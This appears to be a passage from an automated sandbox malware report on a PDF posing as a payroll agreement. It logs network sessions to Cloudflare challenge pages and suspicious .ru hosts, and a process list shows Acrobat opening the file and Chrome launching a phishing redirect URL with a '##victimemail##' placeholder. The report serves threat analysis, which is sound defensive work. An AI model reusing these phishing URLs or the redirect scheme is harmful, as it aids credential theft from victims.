                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/uuwta/0x4AAAAAAA4kMM4osA_FHLjs/auto/fbE/normal/auto/
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 13:50:38 UTC16384OUTData Raw: 76 5f 38 66 65 63 61 37 65 65 66 61 66 30 34 32 62 62 3d 39 4a 24 72 4e 79 70 63 69 79 69 37 24 37 62 70 36 35 24 72 49 24 7a 62 79 6e 70 77 5a 47 72 67 69 5a 48 5a 35 72 67 4a 5a 67 5a 68 72 66 68 72 5a 33 24 53 5a 41 69 56 24 4a 5a 74 36 24 5a 58 72 50 68 70 58 46 6a 79 56 5a 54 5a 62 69 70 70 5a 5a 6c 56 56 24 72 39 24 70 35 46 34 72 37 48 5a 39 6a 72 5a 74 4d 56 4d 68 74 77 5a 24 68 5a 53 67 4d 77 74 46 37 4d 6e 52 4b 62 5a 67 50 50 79 2d 70 54 66 62 42 4a 5a 6d 32 5a 70 31 47 24 51 30 34 42 43 41 5a 32 69 47 4a 58 49 75 70 41 64 66 5a 66 43 57 4a 74 50 47 38 24 69 24 5a 6c 36 7a 36 6c 62 56 5a 4d 6a 50 73 6c 71 4e 61 52 34 72 24 79 24 77 61 36 73 41 45 64 32 58 68 70 73 42 61 48 4d 73 4b 4b 64 74 45 76 39 6d 53 39 45 6f 34 37 25 32 62 48 30 42 4b 53
                                                                                                Data Ascii: v_8feca7eefaf042bb=9J$rNypciyi7$7bp65$rI$zbynpwZGrgiZHZ5rgJZgZhrfhrZ3$SZAiV$JZt6$ZXrPhpXFjyVZTZbippZZlVV$r9$p5F4r7HZ9jrZtMVMhtwZ$hZSgMwtF7MnRKbZgPPy-pTfbBJZm2Zp1G$Q04BCAZ2iGJXIupAdfZfCWJtPG8$i$Zl6z6lbVZMjPslqNaR4r$y$wa6sAEd2XhpsBaHMsKKdtEv9mS9Eo47%2bH0BKS
                                                                                                2025-01-08 13:50:38 UTC16384OUTData Raw: 59 56 50 41 50 5a 35 4f 72 79 5a 6f 41 54 57 79 46 49 41 7a 43 38 49 38 56 5a 58 66 77 5a 79 24 5a 50 5a 49 24 70 77 5a 57 72 39 72 79 5a 69 62 41 77 41 37 55 5a 57 68 7a 55 79 68 33 2b 5a 35 41 5a 61 5a 5a 72 4d 54 37 6a 5a 33 72 35 68 5a 50 5a 32 5a 79 69 70 36 5a 64 72 35 5a 5a 48 5a 4c 72 67 68 79 64 5a 52 5a 6b 74 4c 48 5a 4e 72 49 24 37 24 70 24 5a 49 76 6d 46 72 56 5a 63 72 5a 61 5a 68 72 50 2b 46 7a 5a 4f 5a 49 2d 79 68 5a 38 64 37 5a 4d 34 41 77 50 36 41 5a 63 5a 6f 5a 49 24 5a 75 5a 56 69 50 63 5a 2d 5a 31 6c 71 56 37 50 5a 54 5a 7a 5a 70 77 5a 4d 47 39 69 5a 4f 4d 55 72 77 24 37 57 5a 47 72 50 69 5a 6e 5a 74 4a 4c 53 5a 57 5a 46 72 4d 68 5a 64 5a 4b 72 37 68 70 55 41 38 41 67 55 70 6a 5a 74 4a 24 34 70 72 5a 39 56 7a 66 70 6a 72 63 56 77 56 70
                                                                                                Data Ascii: YVPAPZ5OryZoATWyFIAzC8I8VZXfwZy$ZPZI$pwZWr9ryZibAwA7UZWhzUyh3+Z5AZaZZrMT7jZ3r5hZPZ2Zyip6Zdr5ZZHZLrghydZRZktLHZNrI$7$p$ZIvmFrVZcrZaZhrP+FzZOZI-yhZ8d7ZM4AwP6AZcZoZI$ZuZViPcZ-Z1lqV7PZTZzZpwZMG9iZOMUrw$7WZGrPiZnZtJLSZWZFrMhZdZKr7hpUA8AgUpjZtJ$4prZ9VzfpjrcVwVp
                                                                                                2025-01-08 13:50:38 UTC2082OUTData Raw: 38 5a 32 77 63 51 63 67 2d 62 72 50 76 4f 73 48 6a 38 32 5a 37 53 68 62 52 64 24 70 4a 6c 4c 5a 79 2d 70 58 24 72 72 67 78 74 49 30 6f 64 4a 61 79 58 71 4e 41 37 43 66 39 54 52 5a 49 69 70 55 72 6c 69 48 50 79 4d 78 64 50 6d 4a 37 67 53 72 53 61 31 34 53 5a 33 54 48 79 5a 57 5a 63 67 63 7a 70 4c 45 52 50 61 6a 37 78 51 38 41 35 4a 37 68 44 74 59 4a 39 4f 79 70 45 24 77 55 5a 75 70 52 66 49 2d 70 50 59 58 74 44 62 24 75 79 58 2d 66 50 79 78 39 75 71 47 41 70 4d 45 47 68 68 24 37 66 42 54 5a 70 46 66 52 41 78 69 62 4d 33 51 4f 45 24 4c 4c 34 58 46 4e 75 56 4a 79 6c 51 43 72 66 24 48 31 32 62 67 47 30 79 73 5a 69 41 68 56 79 61 5a 68 68 35 6d 6b 68 5a 41 55 61 2b 31 67 53 68 4a 35 53 6b 38 73 52 5a 62 43 37 6d 31 4d 64 44 4c 46 72 5a 67 59 75 30 64 70 77 34
                                                                                                Data Ascii: 8Z2wcQcg-brPvOsHj82Z7ShbRd$pJlLZy-pX$rrgxtI0odJayXqNA7Cf9TRZIipUrliHPyMxdPmJ7gSrSa14SZ3THyZWZcgczpLERPaj7xQ8A5J7hDtYJ9OypE$wUZupRfI-pPYXtDb$uyX-fPyx9uqGApMEGhh$7fBTZpFfRAxibM3QOE$LL4XFNuVJylQCrf$H12bgG0ysZiAhVyaZhh5mkhZAUa+1gShJ5Sk8sRZbC7m1MdDLFrZgYu0dpw4
                                                                                                2025-01-08 13:50:39 UTC274INHTTP/1.1 200 OK
                                                                                                Date: Wed, 08 Jan 2025 13:50:38 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Content-Length: 4624
                                                                                                Connection: close
                                                                                                cf-chl-out: zQ2fqHTTfVfdN9gpSC9/nL3yE4ZnmMFS8yBiKWSZn71CepmoLVdN77FJ3c5TAaDtYiEYjxTyZLbvwUm3S3yiF5Kg7fFvFf4CLID3tTGZTA==$CzPFJMIsdV9yUd3F
                                                                                                2025-01-08 13:50:39 UTC1247INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 2d 73 3a 20 41 69 67 47 32 6b 74 77 72 67 35 58 78 4a 4f 71 42 6a 35 48 2f 49 4a 72 76 39 6b 51 58 6a 38 46 34 54 2f 50 2f 4c 48 62 4a 6d 4e 65 4c 70 49 7a 44 79 70 61 4c 68 39 78 31 67 69 75 48 58 31 74 33 66 57 58 6f 6c 42 72 4e 66 59 6e 77 50 5a 4c 33 67 53 6c 6f 6c 75 79 69 4a 39 5a 42 76 78 2b 50 61 70 64 4d 4b 63 6e 62 54 6c 63 6b 4d 39 62 67 4a 48 75 34 51 6c 56 48 32 34 30 58 72 73 6e 47 32 37 4f 6d 6e 49 61 6c 4d 73 65 72 56 36 59 45 62 6e 67 56 78 74 47 62 36 30 56 6e 68 6e 6a 68 79 30 54 2f 4c 59 58 79 43 63 2b 61 76 4c 2f 73 39 42 5a 6a 73 54 35 56 52 41 6d 59 5a 4a 4e 6e 4d 68 4e 6e 6d 62 6c 4d 78 38 6c 71 74 44 75 6b 37 42 76 72 4c 6f 36 6f 79 6c 66 44 68 56 58 44 64 41 71 2b 61 63 56 31 78 6f 7a 4a 6c 5a 5a 35
                                                                                                Data Ascii: cf-chl-out-s: AigG2ktwrg5XxJOqBj5H/IJrv9kQXj8F4T/P/LHbJmNeLpIzDypaLh9x1giuHX1t3fWXolBrNfYnwPZL3gSloluyiJ9ZBvx+PapdMKcnbTlckM9bgJHu4QlVH240XrsnG27OmnIalMserV6YEbngVxtGb60Vnhnjhy0T/LYXyCc+avL/s9BZjsT5VRAmYZJNnMhNnmblMx8lqtDuk7BvrLo6oylfDhVXDdAq+acV1xozJlZZ5
                                                                                                2025-01-08 13:50:39 UTC1217INData Raw: 59 47 70 6d 67 6f 4f 42 64 49 64 52 6c 49 71 46 57 34 57 4e 68 33 31 37 64 47 31 62 65 48 52 2b 58 35 46 66 59 4b 47 6f 66 59 4b 65 66 6e 71 69 6f 59 65 76 63 61 75 46 71 33 4b 79 74 35 43 54 74 72 75 55 71 33 75 42 72 71 54 46 68 6e 2b 41 77 61 4b 67 68 4c 71 75 70 73 69 30 73 73 43 52 78 5a 48 48 6c 63 37 50 7a 39 2f 63 6f 4d 72 4b 6d 72 6e 45 6e 4e 7a 6b 75 62 76 58 79 61 57 6f 32 2b 54 6b 35 38 6e 46 7a 74 66 4d 38 73 7a 53 2b 4c 69 7a 36 4c 6a 56 7a 4f 41 43 31 37 75 38 41 50 54 63 76 50 6a 5a 78 63 72 37 33 39 45 49 41 50 4d 4a 45 50 6a 32 42 4e 55 4f 2b 52 41 66 32 42 77 66 2b 79 50 33 31 2b 38 64 46 75 6b 43 46 67 44 72 44 79 30 45 48 65 77 77 4c 77 49 74 42 68 59 30 39 51 59 64 50 68 55 70 46 45 41 73 52 50 7a 38 50 79 45 64 46 45 4a 4b 4e 30 56
                                                                                                Data Ascii: YGpmgoOBdIdRlIqFW4WNh317dG1beHR+X5FfYKGofYKefnqioYevcauFq3Kyt5CTtruUq3uBrqTFhn+AwaKghLqupsi0ssCRxZHHlc7Pz9/coMrKmrnEnNzkubvXyaWo2+Tk58nFztfM8szS+Liz6LjVzOAC17u8APTcvPjZxcr739EIAPMJEPj2BNUO+RAf2Bwf+yP31+8dFukCFgDrDy0EHewwLwItBhY09QYdPhUpFEAsRPz8PyEdFEJKN0V
                                                                                                2025-01-08 13:50:39 UTC1369INData Raw: 50 67 41 38 4e 30 67 39 2f 34 6b 2f 51 51 58 4b 75 7a 74 35 7a 45 66 45 79 38 34 4d 50 55 43 4e 54 63 4d 47 76 62 36 47 78 55 35 4a 51 4a 42 2f 6a 4d 61 41 45 45 30 4a 77 42 4d 49 6b 30 39 43 6b 30 4f 55 45 78 41 46 7a 4d 55 47 68 6b 51 46 6a 4d 7a 57 78 77 66 59 52 30 65 4f 6a 4d 67 5a 43 64 48 62 6d 42 42 4c 6a 78 74 52 57 5a 50 4d 45 70 4c 4f 54 4e 32 66 54 55 34 50 54 35 76 65 32 78 62 51 48 57 43 59 34 68 36 57 30 5a 69 68 55 2b 46 6a 59 6c 55 66 5a 43 4f 6b 6d 65 58 6c 33 47 5a 56 34 32 61 62 32 36 69 64 6f 36 43 70 57 5a 6e 68 4b 68 71 70 59 4b 74 67 35 32 76 70 49 56 72 6b 6d 2b 68 70 61 69 77 70 36 6c 32 74 58 35 36 65 62 36 2b 67 36 4b 38 73 4d 61 65 78 6f 66 4e 7a 6f 61 69 71 4b 37 4e 76 4b 50 45 6a 71 6d 50 6f 38 79 75 6b 37 4c 54 73 72 79 36
                                                                                                Data Ascii: PgA8N0g9/4k/QQXKuzt5zEfEy84MPUCNTcMGvb6GxU5JQJB/jMaAEE0JwBMIk09Ck0OUExAFzMUGhkQFjMzWxwfYR0eOjMgZCdHbmBBLjxtRWZPMEpLOTN2fTU4PT5ve2xbQHWCY4h6W0ZihU+FjYlUfZCOkmeXl3GZV42ab26ido6CpWZnhKhqpYKtg52vpIVrkm+hpaiwp6l2tX56eb6+g6K8sMaexofNzoaiqK7NvKPEjqmPo8yuk7LTsry6
                                                                                                2025-01-08 13:50:39 UTC1369INData Raw: 49 73 49 67 6f 70 48 4f 6e 6d 4b 66 76 72 49 50 41 6d 4c 6a 59 31 38 41 2f 31 43 50 51 70 50 44 30 61 2b 6a 55 59 4f 54 49 46 52 45 67 56 53 6b 55 59 4c 79 49 4d 50 54 41 6d 52 43 4d 74 54 55 77 33 54 30 67 38 4e 79 77 68 4e 30 41 63 50 69 39 44 4d 56 68 45 53 53 52 47 54 55 77 6f 4f 6b 39 4f 5a 7a 39 43 4b 55 4d 33 54 6e 78 56 4d 33 73 32 55 54 78 2f 68 47 39 76 57 54 6d 41 67 6c 74 62 5a 6f 75 45 5a 35 46 70 69 32 35 75 6a 34 52 6d 63 56 69 59 64 5a 78 6d 64 49 68 6f 6c 33 53 6a 62 4a 4f 6b 70 48 39 62 6e 32 61 61 72 4b 4f 61 70 4a 79 65 6e 33 2b 6c 69 5a 57 54 71 70 52 7a 74 36 36 4a 64 34 43 4c 65 48 71 4d 6f 49 47 67 68 33 2f 48 70 49 65 65 72 62 65 74 7a 34 53 77 30 64 61 52 70 4d 66 4c 6f 36 57 6b 71 4e 43 63 30 38 2b 7a 6f 63 48 42 77 4b 54 57 32
                                                                                                Data Ascii: IsIgopHOnmKfvrIPAmLjY18A/1CPQpPD0a+jUYOTIFREgVSkUYLyIMPTAmRCMtTUw3T0g8NywhN0AcPi9DMVhESSRGTUwoOk9OZz9CKUM3TnxVM3s2UTx/hG9vWTmAgltbZouEZ5Fpi25uj4RmcViYdZxmdIhol3SjbJOkpH9bn2aarKOapJyen3+liZWTqpRzt66Jd4CLeHqMoIGgh3/HpIeerbetz4Sw0daRpMfLo6WkqNCc08+zocHBwKTW2
                                                                                                2025-01-08 13:50:39 UTC669INData Raw: 4d 34 2f 49 78 4a 2f 34 46 41 54 41 6a 42 51 6b 71 4d 51 77 49 45 50 6f 44 49 54 4a 42 2b 50 6b 79 41 78 4e 4c 52 67 6b 4d 54 44 49 77 44 77 77 74 4a 69 35 57 51 79 6b 71 4b 55 63 37 4b 31 34 74 4c 43 78 54 56 6c 67 77 5a 31 38 67 49 54 52 4e 51 43 78 66 59 6e 49 75 59 31 42 6c 52 48 56 69 4f 69 31 6f 61 6d 34 37 62 6c 52 75 59 59 42 7a 5a 45 39 33 66 31 70 54 69 33 74 58 62 47 32 49 63 6e 46 4b 67 31 39 52 63 5a 4a 4d 5a 31 4b 54 66 6d 79 63 64 58 39 64 6a 31 39 67 63 36 65 41 59 59 6c 31 6f 49 31 73 68 34 31 38 66 4a 47 69 72 4a 53 51 67 59 4e 37 68 49 36 5a 63 59 32 71 67 49 75 52 75 35 57 6c 74 70 57 61 6c 63 6a 48 72 34 57 49 72 61 47 4a 69 74 62 4c 70 62 57 30 78 70 72 62 7a 37 43 74 6b 74 72 4f 6e 65 48 42 75 4b 4b 2b 78 62 62 49 78 63 54 61 76 4e
                                                                                                Data Ascii: M4/IxJ/4FATAjBQkqMQwIEPoDITJB+PkyAxNLRgkMTDIwDwwtJi5WQykqKUc7K14tLCxTVlgwZ18gITRNQCxfYnIuY1BlRHViOi1oam47blRuYYBzZE93f1pTi3tXbG2IcnFKg19RcZJMZ1KTfmycdX9dj19gc6eAYYl1oI1sh418fJGirJSQgYN7hI6ZcY2qgIuRu5WltpWalcjHr4WIraGJitbLpbW0xprbz7CtktrOneHBuKK+xbbIxcTavN


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                35192.168.2.550039104.18.95.414438072C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 13:50:39 UTC599OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1616110350:1736343072:QTukKO-3rnkh5oSMj4bmwfvqfLwGTNfL7xuiRGubg6s/8feca7eefaf042bb/ghySCgmgzWFOmDPDrS26.j0yKRYwxDxH8pEt0ykykzM-1736344220-1.1.1.1-2XIMhubvoLlhHuebeEIOvK9GTQZzT7N5Q9E3GGq2qaz955cD2DXnSYumL7LUYM33 HTTP/1.1
                                                                                                Host: challenges.cloudflare.com
                                                                                                Connection: keep-alive
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept: */*
                                                                                                Sec-Fetch-Site: none
                                                                                                Sec-Fetch-Mode: cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 13:50:39 UTC379INHTTP/1.1 404 Not Found
                                                                                                Date: Wed, 08 Jan 2025 13:50:39 GMT
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 7
                                                                                                Connection: close
                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                cf-chl-out: +vBEVHfQYhaWCN+ngCqKgT8uCV4fQRpJHUc=$dPiQYyiIyAHaGDV0
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8feca8695e1dde9b-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2025-01-08 13:50:39 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                Data Ascii: invalid


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                36192.168.2.550041104.21.82.1884438072C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 13:50:40 UTC665OUTGET /eiplrjzzfrejlblaunoeneKVeqNiYCDPZXKMQJICCTDCGMWODAHEQACYBMXECL HTTP/1.1
                                                                                                Host: mxkyzscyur8nfklyvxelqzlfebdqukcm0xreokx7wajreqwksql15.apouters.ru
                                                                                                Connection: keep-alive
                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                Accept: */*
                                                                                                Origin: https://ppx.musicstrevbng.ru
                                                                                                Sec-Fetch-Site: cross-site
                                                                                                Sec-Fetch-Mode: cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                Referer: https://ppx.musicstrevbng.ru/
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 13:50:40 UTC896INHTTP/1.1 200 OK
                                                                                                Date: Wed, 08 Jan 2025 13:50:40 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Access-Control-Allow-Origin: *
                                                                                                cf-cache-status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fFvsO0TJXYsCDnHiuy%2FkRWYuKIPmLFRYB%2BBAP5lQf3pihLvHQYfYZAjBIU2ChHHhcIs5OnFoTmfIF%2Bch7zAHhwG1d7KF08PhfL%2FZDUnFyWCYcTsElM1MR%2Ba7ENyetDZy5VlCIxRII%2FYViMoWLkm25OJybgxCIk400I90TW7eq93z5XLj8CxU0YnQZ6XZDBO1Toe4bA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8feca86dbe28425c-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2071&min_rtt=2068&rtt_var=782&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1243&delivery_rate=1393129&cwnd=226&unsent_bytes=0&cid=713a255318d36dd5&ts=575&x=0"
                                                                                                2025-01-08 13:50:40 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                Data Ascii: 11
                                                                                                2025-01-08 13:50:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                37192.168.2.550045172.67.162.594438072C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 13:50:41 UTC451OUTGET /eiplrjzzfrejlblaunoeneKVeqNiYCDPZXKMQJICCTDCGMWODAHEQACYBMXECL HTTP/1.1
                                                                                                Host: mxkyzscyur8nfklyvxelqzlfebdqukcm0xreokx7wajreqwksql15.apouters.ru
                                                                                                Connection: keep-alive
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept: */*
                                                                                                Sec-Fetch-Site: none
                                                                                                Sec-Fetch-Mode: cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 13:50:42 UTC900INHTTP/1.1 200 OK
                                                                                                Date: Wed, 08 Jan 2025 13:50:42 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Access-Control-Allow-Origin: *
                                                                                                cf-cache-status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wQyR%2BRUMGMrLJhyjNErShfCJfzoMWUqIiaRzJSrOGr5v%2BxGWtaL%2FuKWHIGa0LZin44kBnSKBTDVYUgt1m%2BflNUdmpyCPJ6ramU6suWCUlEAPpKzu%2FDiWxpqfAD4GI2Y7tBjh0%2Bx4LUQYe%2Bfpz%2BHV0dvrq0Qy6VhxjYLiMwm4EbQtwJAA0SZf9cHwfc3r8czulmxyqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8feca878bfb04373-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1629&min_rtt=1622&rtt_var=614&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1029&delivery_rate=1800246&cwnd=236&unsent_bytes=0&cid=5d7674a2520b03b7&ts=580&x=0"
                                                                                                2025-01-08 13:50:42 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                Data Ascii: 11
                                                                                                2025-01-08 13:50:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Click to jump to process

                                                                                                Click to jump to process

                                                                                                Click to dive into process behavior distribution

                                                                                                Click to jump to process

                                                                                                Target ID:0
                                                                                                Start time:08:48:02
                                                                                                Start date:08/01/2025
                                                                                                Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Selvi Payroll Benefits & Bonus Agreementfdp.pdf"
                                                                                                Imagebase:0x7ff686a00000
                                                                                                File size:5'641'176 bytes
                                                                                                MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:2
                                                                                                Start time:08:48:03
                                                                                                Start date:08/01/2025
                                                                                                Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                                Imagebase:0x7ff6413e0000
                                                                                                File size:3'581'912 bytes
                                                                                                MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:4
                                                                                                Start time:08:48:03
                                                                                                Start date:08/01/2025
                                                                                                Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1520,i,5443044251436294696,11172737723768738417,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                                Imagebase:0x7ff6413e0000
                                                                                                File size:3'581'912 bytes
                                                                                                MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:5
                                                                                                Start time:08:48:05
                                                                                                Start date:08/01/2025
                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://warrior-empire.com/res444.php?4-68747470733a2f2f5050782e6d757369637374726576626e672e72752f417834454d2f2346-##victimemail##
                                                                                                Imagebase:0x7ff715980000
                                                                                                File size:3'242'272 bytes
                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                Target ID:6
                                                                                                Start time:08:48:06
                                                                                                Start date:08/01/2025
                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2436 --field-trial-handle=2184,i,72692833657749042,4424346579211033775,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                Imagebase:0x7ff715980000
                                                                                                File size:3'242'272 bytes
                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                No disassembly